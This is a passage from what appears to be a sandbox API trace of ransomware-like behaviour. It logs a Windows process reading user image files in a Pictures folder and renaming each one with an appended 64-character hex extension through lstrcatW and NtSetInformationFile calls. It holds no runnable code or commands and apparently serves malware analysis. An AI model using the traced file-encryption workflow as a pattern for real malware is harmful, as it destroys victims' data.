ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.075] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg", lpString2=".BC4A05DEB1C4B0E7C25D7A544E00150A7E33E0FBFBB102166314E696DDD5872E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg.BC4A05DEB1C4B0E7C25D7A544E00150A7E33E0FBFBB102166314E696DDD5872E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\CfFFw49ps55T_yZ_Hc.jpg.BC4A05DEB1C4B0E7C25D7A544E00150A7E33E0FBFBB102166314E696DDD5872E" [0125.075] GetProcessHeap () returned 0x600000 [0125.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x150) returned 0x311a978 [0125.075] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x311a978, Length=0x150, FileInformationClass=0xa) returned 0x0 [0125.077] CloseHandle (hObject=0x31c) returned 1 [0125.077] GetProcessHeap () returned 0x600000 [0125.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.078] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.081] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.081] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.082] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.083] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png", lpString2=".73CE3C0AA086A3EC6116F332E2F68A6DFAF3743CF50A22E5B8FA76BB7A31B87F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png.73CE3C0AA086A3EC6116F332E2F68A6DFAF3743CF50A22E5B8FA76BB7A31B87F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png.73CE3C0AA086A3EC6116F332E2F68A6DFAF3743CF50A22E5B8FA76BB7A31B87F" [0125.083] GetProcessHeap () returned 0x600000 [0125.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x3369f00 [0125.083] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3369f00, Length=0x148, FileInformationClass=0xa) returned 0x0 [0125.084] CloseHandle (hObject=0x31c) returned 1 [0125.084] GetProcessHeap () returned 0x600000 [0125.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.085] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.088] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.088] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.090] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.090] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg", lpString2=".96224709B8F461E316B8DBA1921823E748F608E1530D666C466F0197F420C420" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg.96224709B8F461E316B8DBA1921823E748F608E1530D666C466F0197F420C420") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg.96224709B8F461E316B8DBA1921823E748F608E1530D666C466F0197F420C420" [0125.090] GetProcessHeap () returned 0x600000 [0125.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x150) returned 0x336d180 [0125.090] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d180, Length=0x150, FileInformationClass=0xa) returned 0x0 [0125.092] CloseHandle (hObject=0x31c) returned 1 [0125.093] GetProcessHeap () returned 0x600000 [0125.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.093] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.096] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.096] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.097] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.097] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp", lpString2=".3EE832A2D18D1C9B899EBC4B643B29AB30C6EEE08F94E5F6017A87EE4387847D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp.3EE832A2D18D1C9B899EBC4B643B29AB30C6EEE08F94E5F6017A87EE4387847D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp.3EE832A2D18D1C9B899EBC4B643B29AB30C6EEE08F94E5F6017A87EE4387847D" [0125.097] GetProcessHeap () returned 0x600000 [0125.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x3369190 [0125.097] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3369190, Length=0x144, FileInformationClass=0xa) returned 0x0 [0125.099] CloseHandle (hObject=0x31c) returned 1 [0125.099] GetProcessHeap () returned 0x600000 [0125.100] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.100] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.103] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.103] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.104] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.104] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg", lpString2=".D75276515BF6C1BA5F211EA910E3C35593185DDFAC0E966F9BD15ED05520571A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg.D75276515BF6C1BA5F211EA910E3C35593185DDFAC0E966F9BD15ED05520571A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg.D75276515BF6C1BA5F211EA910E3C35593185DDFAC0E966F9BD15ED05520571A" [0125.104] GetProcessHeap () returned 0x600000 [0125.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x336cdd8 [0125.104] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336cdd8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0125.105] CloseHandle (hObject=0x31c) returned 1 [0125.106] GetProcessHeap () returned 0x600000 [0125.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.106] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.108] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.109] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.110] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.110] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png", lpString2=".8B2D6D684D65BC5F73C3BAB69461BD8E8C3C5D023D50FF393D6962ABA6A2C70A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png.8B2D6D684D65BC5F73C3BAB69461BD8E8C3C5D023D50FF393D6962ABA6A2C70A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png.8B2D6D684D65BC5F73C3BAB69461BD8E8C3C5D023D50FF393D6962ABA6A2C70A" [0125.110] GetProcessHeap () returned 0x600000 [0125.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x152) returned 0x336d2d8 [0125.110] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d2d8, Length=0x152, FileInformationClass=0xa) returned 0x0 [0125.111] CloseHandle (hObject=0x31c) returned 1 [0125.112] GetProcessHeap () returned 0x600000 [0125.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.112] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.117] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.117] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.118] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.119] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png", lpString2=".9E3EF7588F37FF1578DE39F19206423B323CAB28060837572EBEE4A4561A3557" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png.9E3EF7588F37FF1578DE39F19206423B323CAB28060837572EBEE4A4561A3557") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png.9E3EF7588F37FF1578DE39F19206423B323CAB28060837572EBEE4A4561A3557" [0125.119] GetProcessHeap () returned 0x600000 [0125.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x336b2f8 [0125.119] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336b2f8, Length=0x148, FileInformationClass=0xa) returned 0x0 [0125.120] CloseHandle (hObject=0x31c) returned 1 [0125.120] GetProcessHeap () returned 0x600000 [0125.120] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.120] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.147] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.147] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.148] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.149] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg", lpString2=".F2007DE5864AF4566CBB9447E7CEFA0848CB027388F4D6360D4A279C47CA385F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg.F2007DE5864AF4566CBB9447E7CEFA0848CB027388F4D6360D4A279C47CA385F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg.F2007DE5864AF4566CBB9447E7CEFA0848CB027388F4D6360D4A279C47CA385F" [0125.149] GetProcessHeap () returned 0x600000 [0125.149] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3153c88 [0125.149] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3153c88, Length=0x124, FileInformationClass=0xa) returned 0x0 [0125.150] CloseHandle (hObject=0x328) returned 1 [0125.151] GetProcessHeap () returned 0x600000 [0125.151] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.152] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.157] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.157] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.158] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.158] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp", lpString2=".396CB4F55D819AC0C3AEA0CFAD52921FBBCE6D3EAE979A66F27CA4F9238B3F58" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp.396CB4F55D819AC0C3AEA0CFAD52921FBBCE6D3EAE979A66F27CA4F9238B3F58") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp.396CB4F55D819AC0C3AEA0CFAD52921FBBCE6D3EAE979A66F27CA4F9238B3F58" [0125.158] GetProcessHeap () returned 0x600000 [0125.158] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3119420 [0125.158] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3119420, Length=0x120, FileInformationClass=0xa) returned 0x0 [0125.159] CloseHandle (hObject=0x328) returned 1 [0125.160] GetProcessHeap () returned 0x600000 [0125.160] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.160] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.163] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.163] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.164] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.166] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp", lpString2=".4B72A3954C01681C5E1A8E0E1ECD53655DA6E8F94D35F849175DD36C7977C236" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp.4B72A3954C01681C5E1A8E0E1ECD53655DA6E8F94D35F849175DD36C7977C236") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp.4B72A3954C01681C5E1A8E0E1ECD53655DA6E8F94D35F849175DD36C7977C236" [0125.166] GetProcessHeap () returned 0x600000 [0125.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x110) returned 0x311aad0 [0125.166] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x311aad0, Length=0x110, FileInformationClass=0xa) returned 0x0 [0125.168] CloseHandle (hObject=0x328) returned 1 [0125.168] GetProcessHeap () returned 0x600000 [0125.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.168] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.175] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.175] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.176] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.177] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp", lpString2=".DF597391FA656A36687B5D3FB367F2F92C07391E7EA8A150620759C4E6FB4361" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp.DF597391FA656A36687B5D3FB367F2F92C07391E7EA8A150620759C4E6FB4361") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp.DF597391FA656A36687B5D3FB367F2F92C07391E7EA8A150620759C4E6FB4361" [0125.177] GetProcessHeap () returned 0x600000 [0125.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13a) returned 0x336d438 [0125.177] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d438, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0125.178] CloseHandle (hObject=0x31c) returned 1 [0125.179] GetProcessHeap () returned 0x600000 [0125.179] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.179] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.183] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.184] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.185] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.186] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp", lpString2=".F79C89287CD7CF559873519F6F10116492AA1C01E8EFC8A07E06107B3A819661" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp.F79C89287CD7CF559873519F6F10116492AA1C01E8EFC8A07E06107B3A819661") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp.F79C89287CD7CF559873519F6F10116492AA1C01E8EFC8A07E06107B3A819661" [0125.186] GetProcessHeap () returned 0x600000 [0125.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x31542a0 [0125.186] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31542a0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0125.187] CloseHandle (hObject=0x31c) returned 1 [0125.189] GetProcessHeap () returned 0x600000 [0125.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.189] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.193] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.194] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.195] NtQueryObject 